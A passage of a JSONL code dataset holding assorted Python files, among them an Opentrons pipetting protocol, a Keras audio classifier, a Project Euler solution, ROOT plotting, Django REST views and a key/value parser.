tuberack_bar, plate_bar = input_file.splitlines()[3].split(',')[:2]\n if not tuberack_scan[:len(tuberack_scan)-4] == tuberack_bar.strip():\n print(tuberack_scan[:len(tuberack_scan)-4])\n raise Exception(f'Tuberack scans do not match ({tuberack_bar}, \\\n{tuberack_scan})')\n if not plate_scan[:len(plate_scan)-4] == plate_bar.strip():\n raise Exception(f'Plate scans do not match ({plate_bar}, {plate_bar})')\n\n if input_file2:\n tuberack_bar2, plate_bar2 = input_file2.splitlines()[3].split(',')[:2]\n if not tuberack_scan2[:len(tuberack_scan2)-4] == tuberack_bar2.strip():\n print(tuberack_scan2[:len(tuberack_scan2)-4])\n raise Exception(f'Tuberack2 scans do not match ({tuberack_bar2}, \\\n {tuberack_scan2})')\n if not plate_scan2[:len(plate_scan2)-4] == plate_bar2.strip():\n raise Exception(\n f'Plate2 scans do not match ({plate_bar2}, {plate_bar2})')\n\n # parse\n inputdata = [[\n [val.strip() for val in line.split(',')]\n for line in input_file.splitlines()[4:]\n if line and line.split(',')[0].strip()]]\n\n tubelist = [[\n well for col in rack.columns()\n for well in col[:8]]]\n\n if input_file2:\n\n inputdata.append([\n [val.strip() for val in line.split(',')]\n for line in input_file2.splitlines()[4:]\n if line and line.split(',')[0].strip()])\n\n tubelist.append([\n well for col in rack.columns()\n for well in col[8:]])\n\n for data, plate, tubes_ordered in zip(inputdata, plates, tubelist):\n for line in data:\n tube = tubes_ordered[int(line[0])-1]\n well = plate.wells()[int(line[1])-1]\n if len(line) >= 3 and line[2]:\n disposal_vol = float(line[2])\n else:\n disposal_vol = default_disposal_vol\n if len(line) >= 4 and line[3]:\n transfer_vol = float(line[3])\n else:\n transfer_vol = default_transfer_vol\n\n # remove contents of well\n _pick_up(p300)\n\n ctx.max_speeds['A'] = 100 # slow descent\n ctx.max_speeds['Z'] = 100 # slow descent\n\n # effective tip capacity 280 with 20 uL air gap\n reps = math.ceil(disposal_vol / 280)\n\n vol = disposal_vol / reps\n\n for rep in range(reps):\n p300.move_to(well.top())\n p300.air_gap(20)\n p300.aspirate(vol, well.bottom(1))\n p300.dispense(\n vol+20, ctx.fixed_trash.wells()[0].top(-5), rate=1.5)\n ctx.delay(seconds=1)\n\n # to improve completeness of removal\n for clearance in [0.7, 0.4, 0.2, 0]:\n p300.aspirate(20, well.bottom(clearance))\n\n del ctx.max_speeds['A'] # reset to default\n del ctx.max_speeds['Z'] # reset to default\n\n p300.drop_tip()\n\n # transfer tube to well\n _pick_up(p300)\n\n # effective tip capacity 280 with 20 uL air gap\n reps = math.ceil(transfer_vol / 280)\n\n vol = transfer_vol / reps\n\n for rep in range(reps):\n p300.move_to(tube.top())\n p300.air_gap(20)\n p300.aspirate(vol, tube.bottom(0.2))\n p300.dispense(vol+20, well.top(-1), rate=1.5)\n ctx.delay(seconds=1)\n\n p300.drop_tip()\n\n # track final used tip\n if not ctx.is_simulating():\n if not os.path.isdir(folder_path):\n os.mkdir(folder_path)\n data = {pip.name: tip_log[pip]['count'] for pip in tip_log}\n with open(tip_file_path, 'w') as outfile:\n json.dump(data, outfile)\n","sub_path":"protocols/121d15-2-96-Greiner-1000/redoreplacementpicking.ot2.apiv2.py","file_name":"redoreplacementpicking.ot2.apiv2.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"22325254","text":"n = int(input())\ndic = (i for i in range(n))\nwhile True:\n ip = input()\n if ip == 'HELP':\n break\n if ip not in ('YES', 'NO', 'HELP'):\n mlp = set(map(int, input().split()))\n if ip == 'YES':\n dic = dic & mlp\n if ip == 'NO':\n dic = dic - mlp\nprint(*dic)\n","sub_path":"files/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"395228988","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division, print_function\nimport collections\nimport json\nimport logging\nimport os\nimport time\nimport warnings\nimport copy\nimport sys\nimport threading\nimport librosa\nimport numpy as np\nimport sounddevice as sd\nimport queue\nimport os\n\n\nimport soundfile as sf\nclass confirmIdentity:\n\n ###########################################################################################\n ###########################################################################################\n #Adding constants for the audio.###########################################################\n ###########################################################################################\n ###########################################################################################\n\n ROOT_FILE_PATH = os.path.dirname(os.path.realpath(__file__)) #The path where this file is located.\n\n MODEL_LABELS_PATH = ROOT_FILE_PATH + '/model_labels.json' #The location of model labels.\n\n MODEL_H5_PATH = ROOT_FILE_PATH + '/model.h5' #The location of model.h5 file.\n\n MODEL_JSON_PATH = ROOT_FILE_PATH + '/model.json' #The location of model.json file.\n\n AUDIO_DEVICE = 0 # Recording device name as listed by `python -m sounddevice`\n\n AUDIO_DURATION = 10 # Duration of audio material to retain, in seconds\n\n SAMPLING_RATE = 44100# Audio sampling rate, other parameters are hand-tuned for 44.1 kHz\n\n CHUNK_SIZE = 882 # Spectrogram hop_size, 882 samples @ 44.1 kHz = 20 ms\n FFT_SIZE = 2 * CHUNK_SIZE # Spectrogram FFT window length\n BLOCK_SIZE = 16 * CHUNK_SIZE # Size of sound device audio capture buffer\n PREDICTION_STEP = 5 # How often new predictions should be output, in blocks\n PREDICTION_STEP_IN_MS = int(PREDICTION_STEP * BLOCK_SIZE / SAMPLING_RATE * 1000)\n SEGMENT_LENGTH = 100 # Lookback window for classification, in chunks, 100 @ 20 ms = 2 s\n\n PROCESSING_DELAY = 0 # Audio streaming delay compensation, in processing steps\n\n MEL_BANDS = 80 # Number of mel frequency bands\n MEL_FREQS = librosa.core.mel_frequencies(n_mels=MEL_BANDS)\n\n AUDIO_MEAN = 20.0\n AUDIO_STD = 20.0\n\n Overlap = int(BLOCK_SIZE/2)\n\n\n\n\n\n ###########################################################################################\n ###########################################################################################\n #Adding constants for the audio.###########################################################\n ###########################################################################################\n ###########################################################################################\n logger = None\n signal = None\n spectoram = None\n audio_queue = None\n last_chunk = None\n predictions = None\n live_audio_feed = None\n model = None\n q = None\n event = None\n\n def __init__(self):\n self.q = queue.Queue(maxsize=self.BLOCK_SIZE)\n self.event = threading.Event()\n\n\n logging.basicConfig(level=logging.DEBUG)\n self.logger = logging.getLogger(__name__)\n\n with open(self.MODEL_LABELS_PATH, 'r') as labels_file:\n self.labels = json.load(labels_file)\n\n\n self.signal = np.zeros((self.AUDIO_DURATION * self.SAMPLING_RATE, 1), dtype='float32')\n self.spectrogram = np.zeros((self.MEL_BANDS, self.AUDIO_DURATION * self.SAMPLING_RATE // self.CHUNK_SIZE), dtype='float32')\n self.audio_queue = collections.deque(maxlen=1000) # Queue for incoming audio blocks\n self.last_chunk = np.zeros((self.CHUNK_SIZE, 1), dtype='float32') # Short term memory for the next step\n\n self.predictions = np.zeros((len(self.labels), self.AUDIO_DURATION * self.SAMPLING_RATE // (self.BLOCK_SIZE * self.PREDICTION_STEP)), dtype='float32')\n self.live_audio_feed = collections.deque(maxlen=1)\n self.model = None\n\n\n\n def get_raspberry_stats(self):\n freq = None\n temp = None\n try:\n with open('/sys/class/thermal/thermal_zone0/temp', 'r') as file:\n temp = int(file.read())\n temp /= 1000.\n temp = np.round(temp, 1)\n temp = '{}\\'C'.format(temp)\n with open('/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq', 'r') as file:\n freq = int(file.read())\n freq /= 1000.\n freq = '{} MHz'.format(int(freq))\n except:\n pass\n\n return temp, freq\n\n def get_predictions(self):\n print(self.predictions)\n\n\n def start(self, pathToAudioFile):\n self.targetsToStore = []\n # Import classifier model\n self.logger.info('Initializing a convolutional neural network model...')\n global model\n\n THEANO_FLAGS = ('device=cpu,'\n 'floatX=float32,'\n 'dnn.conv.algo_bwd_filter=deterministic,'\n 'dnn.conv.algo_bwd_data=deterministic')\n\n os.environ['THEANO_FLAGS'] = THEANO_FLAGS\n os.environ['KERAS_BACKEND'] = 'theano'\n\n import keras\n keras.backend.set_image_dim_ordering('th')\n\n with open(self.MODEL_JSON_PATH, 'r') as file:\n cfg = file.read()\n model = keras.models.model_from_json(cfg)\n\n model.load_weights(self.MODEL_H5_PATH)\n self.logger.debug('Loaded Keras model with weights.')\n\n #Import recorded autio and distribute as chunks.\n for block in sf.blocks(pathToAudioFile, blocksize=self.BLOCK_SIZE, overlap=self.Overlap, dtype='float32', always_2d=True):\n self.audio_queue.append(copy.deepcopy(block))\n print(np.shape(block))\n\n blocks = []\n processing_queue = collections.deque()\n # Process incoming audio blocks\n keepGoing = True\n while keepGoing:\n if(self.audio_queue.__len__() < 1):\n keepGoing = False\n\n while len(self.audio_queue) > 0 and len(blocks) < self.PREDICTION_STEP:\n blocks.append(self.audio_queue.popleft())\n if len(blocks) == self.PREDICTION_STEP:\n new_audio = np.concatenate(blocks)\n\n # Populate audio for live streaming\n self.live_audio_feed.append(new_audio[:, 0].copy())\n\n blocks = []\n processing_queue.append(new_audio)\n\n if len(processing_queue) > self.PROCESSING_DELAY + 1: # +1 for JavaScript streaming delay\n start_time = time.time()\n\n # Populate audio signal\n step_audio = processing_queue.pop()\n n_samples = len(step_audio)\n self.signal[:-n_samples] = self.signal[n_samples:]\n self.signal[-n_samples:] = step_audio[:]\n\n # Populate spectrogram\n new_spec = librosa.feature.melspectrogram(np.concatenate([self.last_chunk, step_audio])[:, 0],\n self.SAMPLING_RATE, n_fft=self.FFT_SIZE,\n hop_length=self.CHUNK_SIZE, n_mels=self.MEL_BANDS)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') # Ignore log10 zero division\n new_spec = librosa.core.perceptual_weighting(new_spec, self.MEL_FREQS, amin=1e-5,\n ref_power=1e-5, top_db=None)\n new_spec = np.clip(new_spec, 0, 100)\n n_chunks = np.shape(new_spec)[1]\n self.spectrogram[:, :-n_chunks] = self.spectrogram[:, n_chunks:]\n self.spectrogram[:, -n_chunks:] = new_spec\n\n # Classify incoming audio\n self.predictions[:, :-1] = self.predictions[:, 1:]\n offset = self.SEGMENT_LENGTH // 2\n pred = self.classify([\n np.stack([self.spectrogram[:, -(self.SEGMENT_LENGTH + offset):-offset]]),\n np.stack([self.spectrogram[:, -self.SEGMENT_LENGTH:]]),\n ])\n self.predictions[:, -1] = pred\n target = self.labels[np.argmax(pred)]\n self.targetsToStore.append(target)\n # Clean up\n self.last_chunk[:] = step_audio[-self.CHUNK_SIZE:]\n\n end_time = time.time()\n time_spent = int((end_time - start_time) * 1000)\n temp, freq = self.get_raspberry_stats()\n blocks_in_ms = int(self.PREDICTION_STEP * self.BLOCK_SIZE / self.SAMPLING_RATE * 1000)\n msg = '[{}] {}% = {} ms / {} ms ({} blocks) - temp: {} | freq: {} ==> {}'\n timestamp = time.strftime('%H:%M:%S')\n self.logger.debug(msg.format(timestamp, np.round(time_spent / blocks_in_ms * 100, 1),\n time_spent, blocks_in_ms, self.PREDICTION_STEP, temp, freq, target))\n\n time.sleep(0.05)\n\n\n def classify(self, segments):\n X = np.stack(segments)\n X -= self.AUDIO_MEAN\n X /= self.AUDIO_STD\n pred = model.predict(X)\n pred = np.average(pred, axis=0, weights=np.arange(len(pred)) + 1)\n return pred\n\n\n\n #gets the most common occurance of an identity\n def getTarget(self):\n counter = 0\n if(self.targetsToStore.__len__() > 1):\n num = self.targetsToStore[0]\n for i in self.targetsToStore:\n appearance = self.targetsToStore.count(i)\n if(appearance > counter):\n counter = appearance\n num = i\n return num\n else:\n noresponse = \"No known noise was detected!\"\n return noresponse","sub_path":"audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497303169","text":"\"\"\"\nProject Euler Problem #28\n==========================\n\nStarting with the number 1 and moving to the right in a clockwise\ndirection a 5 by 5 spiral is formed as follows:\n\n 21 22 23 24 25\n 20 7 8 9 10\n 19 6 1 2 11\n 18 5 4 3 12\n 17 16 15 14 13\n\nIt can be verified that the sum of both diagonals is 101.\n\nWhat is the sum of both diagonals in a 1001 by 1001 spiral formed in the\nsame way?\n\"\"\"\n\nfrom math import floor\nfrom pprint import PrettyPrinter\n\ndef fill_grid(size):\n ''' This is ugly as sin. Figure out a cleaner way to do it.'''\n\n total_elements = size**2\n\n middle = floor(size / 2)\n\n grid = [[0]*size for _ in range(size)]\n\n direction_steps = 1\n\n grid[middle][middle] = 1\n curr_element = 2\n\n x_pos, y_pos = middle, middle\n while True:\n for move in [[1,0],[0,1]]:\n for _ in range(direction_steps):\n x_pos += move[0]\n y_pos += move[1]\n\n grid[x_pos][y_pos] = curr_element\n\n if curr_element == total_elements:\n return grid\n else:\n curr_element += 1\n\n for move in [[-1,0],[0,-1]]:\n for _ in range(direction_steps+1):\n x_pos += move[0]\n y_pos += move[1]\n\n grid[x_pos][y_pos] = curr_element\n\n if curr_element == total_elements:\n return grid\n else:\n curr_element += 1\n\n direction_steps += 2\n\n\ndef sum_diagonals(grid):\n\n total = 0\n\n for i in range(len(grid)):\n total += grid[i][i]\n total += grid[len(grid)-1-i][i]\n\n middle = floor(len(grid) / 2)\n total -= grid[middle][middle]\n\n return total\n\n# ------------------------------------------------------\n\nprint(sum_diagonals(fill_grid(1001)))\n","sub_path":"028.py","file_name":"028.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211398358","text":"import sys, os, ROOT, argparse\nfrom collections import defaultdict\n\nROOT.TH1.SetDefaultSumw2()\nROOT.gROOT.SetBatch(True)\nROOT.gStyle.SetOptStat(\"\")\nROOT.gStyle.SetPaintTextFormat(\"3.2f\")\nROOT.gStyle.SetFrameLineWidth(2)\n\nusage = \"usage: %prog [options]\"\nparser = argparse.ArgumentParser(usage)\nparser.add_argument(\"--inputDir\", dest=\"inputDir\", help=\"Path to input\", default=\"NULL\", type=str) \n\narg = parser.parse_args()\n\nOPTIONSMAP = {\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d1\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J} D1\"}},\n \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d2\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J} D2\"}},\n \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d3\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J} D3\"}},\n \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d4\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J} D4\"}},\n \"h_njets_1l_HT300_ge7j_ge1b_Mbl\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J}\"}}\n}\n\ndef doOptions(histo, histoName):\n\n is1D = \"TH1\" in histo.ClassName()\n\n for axis, options in OPTIONSMAP[histoName].iteritems():\n\n if axis == \"X\":\n if \"rebin\" in options:\n if is1D: histo.Rebin(options[\"rebin\"])\n else: histo.RebinX(options[\"rebin\"])\n if \"min\" in options and \"max\" in options: histo.GetXaxis().SetRangeUser(options[\"min\"],options[\"max\"])\n if \"title\" in options: histo.GetXaxis().SetTitle(options[\"title\"])\n if axis == \"Y\":\n if \"rebin\" in options:\n if is1D: histo.Rebin(options[\"rebin\"])\n else: histo.RebinY(options[\"rebin\"])\n if \"min\" in options and \"max\" in options: histo.GetYaxis().SetRangeUser(options[\"min\"],options[\"max\"])\n if \"title\" in options: histo.GetYaxis().SetTitle(options[\"title\"])\n if axis == \"Z\":\n if \"min\" in options and \"max\" in options: histo.GetZaxis().SetRangeUser(options[\"min\"],options[\"max\"])\n\ndef prettyHisto(histo,magicFactor=1.0,magicFactor2=1.0):\n histo.GetYaxis().SetLabelSize(magicFactor*0.055); histo.GetYaxis().SetTitleSize(magicFactor*0.08); histo.GetYaxis().SetTitleOffset(0.7/magicFactor)\n histo.GetXaxis().SetLabelSize(magicFactor*0.055); histo.GetXaxis().SetTitleSize(magicFactor*0.08); histo.GetXaxis().SetTitleOffset(0.8/magicFactor2)\n histo.GetZaxis().SetLabelSize(magicFactor*0.055); histo.GetZaxis().SetTitleSize(magicFactor*0.06)\n\ndef fillMap(inRootFile, theMap):\n\n if \".root\" not in inRootFile: return\n histoFile = ROOT.TFile.Open(inRootFile, \"READ\")\n for hkey in histoFile.GetListOfKeys():\n if \"TH\" not in hkey.GetClassName(): continue\n\n if hkey.GetName() == \"EventCounter\" or hkey.GetName().find(\"njets\") == -1: continue\n\n histo = hkey.ReadObj()\n histo.SetDirectory(0)\n\n histo.Sumw2()\n \n theMap.setdefault(hkey.GetName(), histo)\n\nif __name__ == '__main__':\n\n XCANVAS = 2400; YCANVAS = 2400\n\n if arg.inputDir == \"NULL\": quit()\n stub = arg.inputDir.split(\"condor/\")[-1]\n\n inRootFile = arg.inputDir + \"/2017_MC.root\"\n \n outpath = \"./plots/%s/\"%(stub)\n if not os.path.exists(outpath): os.makedirs(outpath)\n\n mapPFAhistos = {}\n\n fillMap(inRootFile, mapPFAhistos)\n\n # Save the final histograms\n\n njetsD1 = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d1\"]; prettyHisto(njetsD1)\n njetsD2 = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d2\"]; prettyHisto(njetsD2)\n njetsD3 = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d3\"]; prettyHisto(njetsD3)\n njetsD4 = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d4\"]; prettyHisto(njetsD4)\n\n njets = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl\"]; prettyHisto(njets)\n\n XMin = 0; XMax = 1\n YMin = 0; YMax = 1\n\n njetsD1.SetTitle(\"\"); njetsD1.Scale(1./njetsD1.Integral()); doOptions(njetsD1, \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d1\")\n njetsD2.SetTitle(\"\"); njetsD2.Scale(1./njetsD2.Integral()); doOptions(njetsD2, \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d2\")\n njetsD3.SetTitle(\"\"); njetsD3.Scale(1./njetsD3.Integral()); doOptions(njetsD3, \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d3\")\n njetsD4.SetTitle(\"\"); njetsD4.Scale(1./njetsD4.Integral()); doOptions(njetsD4, \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d4\")\n njets.SetTitle(\"\"); njets.Scale(1./njets.Integral()); doOptions(njets, \"h_njets_1l_HT300_ge7j_ge1b_Mbl\")\n\n njetsD1.Divide(njets); njetsD1.SetMinimum(0.50); njetsD1.SetMaximum(1.50); njetsD1.GetYaxis().SetNdivisions(308)\n njetsD2.Divide(njets); njetsD2.SetMinimum(0.50); njetsD2.SetMaximum(1.50); njetsD2.GetYaxis().SetNdivisions(308)\n njetsD3.Divide(njets); njetsD3.SetMinimum(0.50); njetsD3.SetMaximum(1.50); njetsD3.GetYaxis().SetNdivisions(308)\n njetsD4.Divide(njets); njetsD4.SetMinimum(0.50); njetsD4.SetMaximum(1.50); njetsD4.GetYaxis().SetNdivisions(308)\n\n njetsD1.SetMarkerColor(ROOT.kBlack); njetsD1.SetLineColor(ROOT.kBlack); njetsD1.SetMarkerSize(4); njetsD1.SetMarkerStyle(20); njetsD1.SetLineWidth(3)\n njetsD2.SetMarkerColor(ROOT.kRed); njetsD2.SetLineColor(ROOT.kRed); njetsD2.SetMarkerSize(4); njetsD2.SetMarkerStyle(20); njetsD2.SetLineWidth(3)\n njetsD3.SetMarkerColor(ROOT.kBlue); njetsD3.SetLineColor(ROOT.kBlue); njetsD3.SetMarkerSize(4); njetsD3.SetMarkerStyle(20); njetsD3.SetLineWidth(3)\n njetsD4.SetMarkerColor(ROOT.kGreen+2); njetsD4.SetLineColor(ROOT.kGreen+2); njetsD4.SetMarkerSize(4); njetsD4.SetMarkerStyle(20); njetsD4.SetLineWidth(3)\n\n mvaBins = [\"D1\", \"D2\", \"D3\", \"D4\"]\n\n for mva in mvaBins:\n\n c1 = ROOT.TCanvas(\"njets%s\"%(mva), \"njets%s\"%(mva), XCANVAS, YCANVAS); \n c1.cd(); ROOT.gPad.SetPad(XMin, YMin, XMax, YMax)\n\n ROOT.gPad.SetGridy(); ROOT.gPad.SetGridx()\n ROOT.gPad.SetTopMargin(0.03)\n ROOT.gPad.SetLeftMargin(0.11)\n ROOT.gPad.SetBottomMargin(0.15)\n ROOT.gPad.SetRightMargin(0.04)\n\n if mva == \"D1\": njetsD1.Draw(\"L\")\n elif mva == \"D2\": njetsD2.Draw(\"L\")\n elif mva == \"D3\": njetsD3.Draw(\"L\")\n elif mva == \"D4\": njetsD4.Draw(\"L\")\n\n c1.SaveAs(\"%s/njets%s_Total_Ratio.pdf\"%(outpath,mva))\n","sub_path":"Analyzer/test/finalNJetsRatioPlots.py","file_name":"finalNJetsRatioPlots.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226553841","text":"import os\nimport configparser\n\nfrom util.repo_handling.repo_file import repo_file\n\n\nclass GitRepository(object):\n\n worktree = None\n gitdir = None\n conf = None\n\n def __init__(self, path, force=False):\n self.worktree = path\n self.gitdir = os.path.join(path, \".git\")\n\n if not (force or os.path.isdir(self.gitdir)):\n raise Exception(\"Not a Git repository %s\" % path)\n\n # Read configuration file in .git/config\n self.conf = configparser.ConfigParser()\n cf = repo_file(self, \"config\")\n\n if cf and os.path.exists(cf):\n self.conf.read([cf])\n\n elif not force:\n raise Exception(\"Configuration file missing\")\n\n if not force:\n vers = int(self.conf.get(\"core\", \"repositoryformatversion\"))\n if vers != 0:\n raise Exception(\"Unsupported repositoryformatversion %s\" % vers)\n","sub_path":"objects/GitRepository.py","file_name":"GitRepository.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"289978453","text":"#!/usr/bin/env python3\r\n\r\nimport sys\r\n\r\ninput_file = sys.argv[1]\r\nprint(\"Output: {}\".format(sys.argv[1]))\r\nfilereader = open(input_file, 'r')\r\nfor row in filereader:\r\n print(row.strip())\r\nfilereader.close()\r\n","sub_path":"first_script.py","file_name":"first_script.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555834940","text":"from .models import Question, Answer, Tag, User\nfrom .serializers import QuestionSerializer, AnswerSerializer, UserSerializer, TagSerializer\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom questions import serializers\n# from .serializers import \n\n@api_view(['GET'])\ndef questionList(request):\n questions = Question.objects.all()\n serializer = QuestionSerializer(questions, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef questionDetail(request, pk):\n questions = Question.objects.get(id=pk)\n serializer = QuestionSerializer(questions, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef questionCreate(request):#save logged user in request\n serializer = QuestionSerializer(data=request.data)\n \n if serializer.is_valid():\n serializer.save(user=request.user)\n \n return Response(serializer.data)\n\n@api_view(['PUT'])\ndef questionEdit(request, pk):\n question = Question.objects.get(id=pk)\n serializer = QuestionSerializer(instance=question, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n@api_view(['DELETE'])\ndef questionDelete(request, pk):\n question = Question.objects.get(id=pk)\n question.delete()\n\n return Response('Your question has been deleted.')\n\n@api_view(['GET'])\ndef answerList(request):\n answers = Answer.objects.all()\n serializer = AnswerSerializer(answers, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef answerDetail(request, pk):\n answers = Answer.objects.get(id=pk)\n serializer = AnswerSerializer(answers, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef answerCreate(request):\n serializer = AnswerSerializer(data=request.data)\n question=Question.objects.get(id=request.data[\"question\"])\n \n if serializer.is_valid():\n serializer.save(user=request.user, question=question)\n \n return Response(serializer.data)\n\n@api_view(['GET'])\ndef tagList(request):\n tags = Tag.objects.all()\n serializer = TagSerializer(tags, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef tagDetail(request, pk):\n tags = Tag.objects.get(id=pk)\n serializer = TagSerializer(tags, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef tagCreate(request):\n serializer = TagSerializer(data=request.data)\n \n if serializer.is_valid():\n serializer.save()\n \n return Response(serializer.data)","sub_path":"questions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"100222567","text":"\"\"\"\nModule\n------\nentry.py:\n\nSummary\n-------\nContains routines to facilitate entry of required input data objects, either from manual user input or from\na data file (csv).\n\nNotes\n-----\nMay include database access in the future to save having to create a csv from catalogue after update\n\n\"\"\"\n# Imports included here:\nimport re\n\n# Astropy\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.coordinates.name_resolve import NameResolveError\nfrom astropy.io import ascii\nfrom astropy.table import Table\n\nfrom LCExtract import config\n\n\ndef setFilterUsage():\n # uses global filterSelection\n\n getch = input('Please select filters to display (e.g. griz)....: ')\n # if no entry set default to griz, or check for valid filter combinations\n config.filterSelection = getch\n print()\n\n\ndef setEntryType():\n print('Script will accept file or manual input. Default is manual.')\n while True:\n getch = input(f'Please select file (f) or manual object (m) entry..........: ')\n if getch == '':\n getch = 'm'\n if getch[0].lower() in ('f', 'm'):\n break\n print()\n\n return getch[0].lower()\n\n\ndef setManualEntryType():\n while True:\n getch = input(f'Please select named object (n) or coordinate (c) entry..........: ')\n if getch == '':\n continue\n if getch[0].lower() in ('n', 'c'):\n break\n print()\n\n return getch[0].lower()\n\n\ndef getObjectsCSV():\n # uses global defaultFileName\n error_to_catch = getattr(__builtins__, 'FileNotFoundError', IOError)\n while True:\n getch = input(f'Please enter filename, or for default ({config.defaultFileName})...: ')\n getch = config.defaultFileName if getch == '' else getch\n try:\n f = open(getch)\n except error_to_catch:\n print(f'Unable to locate file \"{getch}\". Please try again.')\n else:\n f.close()\n print(f'Using file \"{getch}\".')\n break\n\n data = ascii.read(getch, guess=False, format='csv', header_start=0, data_start=1)\n return data\n\n\ndef getUserObject():\n manualEntryType = setManualEntryType()\n if manualEntryType == 'n': # named object entry\n while True:\n tempName = input('Enter object name....: ')\n try:\n c = SkyCoord.from_name(tempName, parse=True)\n except NameResolveError:\n print('Unable to resolve. Please try again.')\n else:\n print(f'Object {tempName} found in catalog.')\n break\n elif manualEntryType == 'c': # object coordinate entry\n while True:\n print('Enter object coordinates (ICRS frame. Deg assumed unless specified).')\n tempCoordRA = input('RA (e.g. 10.625, 10d37m30s, 0h42m30s, 00 42 30)....: ')\n tempCoordRA += 'd' if not re.findall('[hdms]', tempCoordRA) else ''\n tempCoordDEC = input('DEC (e.g. 41.2, 41d12m00s, +41 12 00)...: ')\n tempCoordDEC += 'd' if not re.findall('[dms]', tempCoordDEC) else ''\n try:\n c = SkyCoord(tempCoordRA, tempCoordDEC)\n except ValueError:\n print('Unable to identify position. Please try again.')\n except u.UnitsError:\n print('Units error occurred. Please try again.')\n else:\n print(f'Object at {c.to_string(\"hmsdms\")} found.')\n tempName = 'Object in ' + c.get_constellation()\n break\n print()\n manual = [{'Name': tempName, # 'Name': 'Sky position: 153.139, 53.117',\n 'RA': c.ra.degree, # 'RA': 153.1393271,\n 'DEC': c.dec.degree, # 'DEC': 53.117343,\n 'Description': f'Position: {c.to_string(\"hmsdms\")} '}] # 'Description': 'Manual input test'\n return manual\n\n\ndef getObjects():\n entryType = setEntryType()\n if entryType == 'f':\n return getObjectsCSV()\n elif entryType == 'm':\n singleObjectData = getUserObject()\n\n tbl = Table(rows=singleObjectData)\n return tbl\n","sub_path":"build/lib/LCExtract/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524866899","text":"# vim: set et ts=4 sw=4 fileencoding=utf-8:\n'''\nModule for processing key/value files like vfms.\n'''\n\nimport re\n\nKV_PATTERN = re.compile(r'''((?:[^\\s\"']|\"[^\"]*\"|'[^']*')+)''')\nOB_PATTERN = re.compile(r'''^(\"\\w+[\\w\\s*]+\"|\\w+)$''')\n\n\ndef parse(kvfile):\n '''\n Parse the key/value file.\n\n Returns the key/value data as a dict.\n '''\n ret = {}\n key = None\n val = None\n while True:\n line = kvfile.readline()\n if line:\n line = line.strip()\n if line and not line.startswith('//'):\n if line.startswith('}'):\n return ret\n elif line.startswith('{'):\n val = parse(kvfile)\n ret[key.strip('\"')] = val\n else:\n key = OB_PATTERN.findall(line)\n if key:\n key = key[0]\n else:\n key, val = KV_PATTERN.findall(line)\n ret[key.strip('\"')] = val.strip('\"')\n else:\n return ret\n\n\ndef persist(kvdict, outfile, indent=''):\n '''\n Persist the key/value dict to the file.\n '''\n for key, val in kvdict.items():\n if isinstance(val, dict):\n outfile.write(u'{0}{1}\\n'.format(indent, key))\n outfile.write(u'{0}{{\\n'.format(indent))\n persist(val, outfile, '\\t{0}'.format(indent))\n outfile.write(u'{0}}}\\n'.format(indent))\n else:\n outfile.write(u'{0}\"{1}\" \"{2}\"\\n'.format(indent, key, val))\n","sub_path":"nail/util/kvf.py","file_name":"kvf.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249974860","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, 